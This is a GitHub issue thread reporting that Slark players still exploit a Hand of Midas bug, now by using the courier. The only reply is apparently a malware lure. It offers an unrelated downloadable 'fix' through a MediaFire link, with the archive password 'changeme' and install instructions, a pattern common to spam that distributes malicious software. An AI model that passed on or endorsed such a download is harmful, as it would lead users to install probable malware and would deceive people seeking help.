### ISSUE TITLE
Midas still bugged now they using courier

### ISSUE THREAD

**Issue by Sheyla998** [ValveSoftware/Dota2-Gameplay#21389]
### Item name

midas

### Description

Slark doing the same bug abuse as it was before ,now instead hes using the courier to pick the midas up.
@bwvalve hello, u've said in another post that we should open issue if it comes again after update

### Example Match ID and Timestamp

7915870864

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
